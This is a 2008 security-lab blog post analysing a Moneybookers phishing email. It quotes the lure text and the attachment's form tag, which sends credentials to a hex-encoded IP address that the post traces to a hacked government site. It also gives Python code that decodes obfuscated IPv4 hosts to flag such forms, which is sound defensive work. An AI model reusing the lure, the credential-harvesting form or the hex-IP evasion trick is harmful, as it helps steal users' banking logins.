NEWS FROM THE LAB - Sunday, April 6, 2008

Gone Phishing Posted by Mikko @ 22:28 GMT

Somebody is spamming around mails that look like this:

From "www.moneybookers.com" support@moneybookers.com
Date: Sun, 6 Apr 2008 06:56:47 +0900

For security reasons we have sent the message as an attachment file.
This measure has been adopted to prevent personal information theft and data loss.

© Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
Registered in England and Wales under Company No 4260907. Registered office:
Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
None of the information contained in this website constitutes, nor should be construed as Financial Advice.
Internal complaint handling procedures can be requested by contacting our Customer Service Department.


The attachment is an HTML file, asking the user to participate in a Money Launder Prevention program:


When looking at the source code, we can see that the HTML file loads all its components (images, stylesheets) from moneybookers.com — the real site… but the form's POST action looks funky:

   <form method="POST" action="http://0xCA909D9D/HTML/verification.pl.php" style="text-align: left">

Hmmm. 0xCA909D9D. That's a weird way of presenting an IP address: the whole 32-bit address written as a single hexadecimal number (it decodes to 202.144.157.157), which browsers accept without complaint, and which neatly sidesteps anyone grepping the page for a dotted-quad.
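
For those who want to catch this trick in their own mail or proxy filters, here is an added example (our own illustration, not code from the phishing kit or from Moneybookers) that decodes every IPv4 spelling browsers accept in a URL host: plain hex like 0xCA909D9D, a single decimal number, octal and hex dotted parts, and the short forms with fewer than four parts. It then pulls the action URLs out of a page's form tags and flags the ones whose host is an IP literal in any disguise. The SAMPLE_HTML is constructed for the demo and only borrows the form tag from the post; the function names are our own.

```python
"""Decode the obfuscated IPv4 literals that browsers accept as URL hosts."""
import re
from urllib.parse import urlsplit

# Constructed sample (not the real phishing page): the form tag from the post
# plus a harmless second form pointing at a hostname for comparison.
SAMPLE_HTML = """
<form method="POST" action="http://0xCA909D9D/HTML/verification.pl.php" style="text-align: left">
<input name="user"><input name="pass">
</form>
<form action="https://www.moneybookers.com/">
</form>
"""

_HEX = re.compile(r"[0-9a-f]+", re.I)
_OCT = re.compile(r"[0-7]+")
_DEC = re.compile(r"[0-9]+")


def _parse_part(part):
    """Decode one dot-separated piece the way browsers do (WHATWG URL rules):
    0x-prefix is hex, leading 0 is octal, otherwise decimal. None if not numeric."""
    if part[:2].lower() == "0x":
        digits = part[2:]
        if digits == "":
            return 0  # a bare "0x" counts as zero
        return int(digits, 16) if _HEX.fullmatch(digits) else None
    if len(part) > 1 and part[0] == "0":
        digits = part[1:]
        return int(digits, 8) if _OCT.fullmatch(digits) else None
    return int(part, 10) if _DEC.fullmatch(part) else None


def normalize_ipv4_host(host):
    """Return the dotted-quad for any IPv4 spelling a browser would accept,
    or None if the host is not an IPv4 literal (e.g. a real hostname)."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()  # tolerate a trailing dot
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for p in parts:
        n = _parse_part(p)
        if n is None:
            return None
        nums.append(n)
    # Every part but the last is one byte; the last part fills the remaining bytes,
    # so "0xCA909D9D" alone covers all four and "202.9477533" covers 1 + 3.
    if any(n > 255 for n in nums[:-1]):
        return None
    if nums[-1] >= 256 ** (5 - len(nums)):
        return None
    value = nums[-1]
    for i, n in enumerate(nums[:-1]):
        value += n << (8 * (3 - i))
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


_ACTION = re.compile(r"<form\b[^>]*\baction\s*=\s*[\"']([^\"']+)[\"']", re.I)


def form_action_hosts(html):
    """(action URL, normalized IPv4 or None) for every form in the page."""
    out = []
    for url in _ACTION.findall(html):
        host = urlsplit(url).hostname or ""  # urlsplit lowercases the host
        out.append((url, normalize_ipv4_host(host)))
    return out


def suspicious_form_actions(html):
    """Forms that POST to a raw IP address, however it is spelled."""
    return [(u, ip) for u, ip in form_action_hosts(html) if ip is not None]


if __name__ == "__main__":
    for url, ip in form_action_hosts(SAMPLE_HTML):
        print(f"{url} -> {ip if ip else 'hostname, not an IP literal'}")
```

A form on a page that otherwise references a bank's real domain but submits to an IP literal is a strong phishing signal on its own; normalizing first is what keeps the hex, decimal and octal variants from slipping past a filter that only knows dotted quads.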

Let's see where this goes.


But of course. Turns out it's the site of the Anti-corruption commission of Bhutan:


The commission has been informed that they've been hacked.